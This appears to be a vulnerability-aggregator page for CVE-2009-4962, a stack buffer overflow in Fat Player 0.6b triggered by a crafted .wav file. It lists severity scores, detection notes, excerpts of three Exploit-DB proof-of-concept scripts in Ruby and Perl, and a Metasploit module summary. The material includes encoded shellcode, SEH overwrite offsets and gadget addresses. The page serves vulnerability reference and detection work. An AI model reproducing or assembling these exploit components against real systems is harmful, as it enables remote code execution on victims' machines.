CVE-2009-4962
published 2010-07-28CVE-2009-4962: Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute arbitrary code via a long string in a .wav file. NOTE: some of these details…
PriorityP349critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
31.38%
98.1th percentile
Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute arbitrary code via a long string in a .wav file. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adammo | fat_player | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x06\x90\x90
bytes↗
\x39\x1f\xd1\x72
bytes↗
\x90\x90\xeb\x06
bytes↗
0x0046bee3
bytes↗
\xEB\x09\x90\x90
bytes↗
\x1F\x22\x44\x00
bytes↗
\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca
- →Buffer overflow is triggered by a .wav file containing a long string; the overflow offset to SEH overwrite occurs at 4132 bytes of padding. ↗
- →SEH-based exploit uses a pop/pop/ret gadget from msacm32.drv at address 0x72D11F39 to redirect execution. ↗
- →Alternative SEH overwrite uses a pop/pop/ret gadget from FatPlayer.exe itself at address 0x0046bee3. ↗
- →Universal exploit uses a JMP ESP gadget at address 0x00442200 within the application for shellcode redirection. ↗
- →Malicious .wav files crafted for this exploit are padded to approximately 40000 bytes total; detection of anomalously large .wav files opened by FatPlayer 0.6b is warranted. ↗
- →The overflow offset for the universal exploit variant is 4124 bytes before the SEH record, slightly different from the 4132-byte offset in other variants. ↗
- →Metasploit module exists for this vulnerability targeting Windows fileformat via a crafted .wav file; monitor for use of the metasploit module path windows/fileformat/fatplayer_wav. ↗
- ·Exploits were tested specifically on Windows XP SP3; gadget addresses (msacm32.drv, FatPlayer.exe) are version- and OS-specific and will differ on other platforms or patch levels. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Fat Player 0.6b - '.wav' Local Buffer Overflow (SEH)
exploitdb·2010-10-18
CVE-2009-4962 Fat Player 0.6b - '.wav' Local Buffer Overflow (SEH)
Fat Player 0.6b - '.wav' Local Buffer Overflow (SEH)
---
# Exploit Title: FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability (SEH)
# Date: 10/18/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/fatplayer/files/
# Version: 0.6 Beta
# Tested on: Windows XP SP3 EN
# CVE: N/A
#! /usr/bin/env ruby
junk = "\x41" * 4132
nSEH = "\x90\x90\xeb\x06"
SEH = [0x0046bee3].pack('V') #pop pop ret from FatPlayer.exe
junk2 = "\x42\x42"
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
payload = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc"
payload << "\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
payload << "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85"
payload << "\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5"
Exploit-DB
Fat Player 0.6b - '.WAV' File Processing Buffer Overflow (SEH)
exploitdb·2010-08-09·CVSS 9.3
CVE-2009-4962 [CRITICAL] Fat Player 0.6b - '.WAV' File Processing Buffer Overflow (SEH)
Fat Player 0.6b - '.WAV' File Processing Buffer Overflow (SEH)
---
#################################################################################################
# Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute
# arbitrary code via a long string in a .wav file. NOTE: some of these details are
# obtained from third party information.
#
# Reference:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4962
# http://xforce.iss.net/xforce/xfdb/52713
# http://sourceforge.net/projects/fatplayer/
# http://www.exploit-db.com/exploits/9495/
#
# Tested on: Windows XP SP3, FatPlayer 0.6b
#
#
# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
#
# Author: Praveen
Exploit-DB
Fat Player 0.6b - '.wav' Universal Local Buffer
exploitdb·2009-08-24
CVE-2009-4962 Fat Player 0.6b - '.wav' Universal Local Buffer
Fat Player 0.6b - '.wav' Universal Local Buffer
---
#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
#Tested on Windows XP SP3 (English)
# Fat Player 0.6b(wav) Universal Local Buffer Exploit
#http://sourceforge.net/projects/fatplayer/
###################################################################
my $shellcode=
"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49".
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56".
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41".
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42".
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a".
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47".
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c".
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a
Metasploit
Fat Player Media Player 0.6b0 Buffer Overflow
metasploit
Fat Player Media Player 0.6b0 Buffer Overflow
Fat Player Media Player 0.6b0 Buffer Overflow
This module exploits a buffer overflow in Fat Player 0.6b. When the application is used to import a specially crafted wav file, a buffer overflow occurs allowing arbitrary code execution.
No writeups or analysis indexed.
http://osvdb.org/57343http://secunia.com/advisories/36441http://www.exploit-db.com/exploits/9495http://www.vupen.com/english/advisories/2009/2394https://exchange.xforce.ibmcloud.com/vulnerabilities/52713http://osvdb.org/57343http://secunia.com/advisories/36441http://www.exploit-db.com/exploits/9495http://www.vupen.com/english/advisories/2009/2394https://exchange.xforce.ibmcloud.com/vulnerabilities/52713
2010-07-28
Published